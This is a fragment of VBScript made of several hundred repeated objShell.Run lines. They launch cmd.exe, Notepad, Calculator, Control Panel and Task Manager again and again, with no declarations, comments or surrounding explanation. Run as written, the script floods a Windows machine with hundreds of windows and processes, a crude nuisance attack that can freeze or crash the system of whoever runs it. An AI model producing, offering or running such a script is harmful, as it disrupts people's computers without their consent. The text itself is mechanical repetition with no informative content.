objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
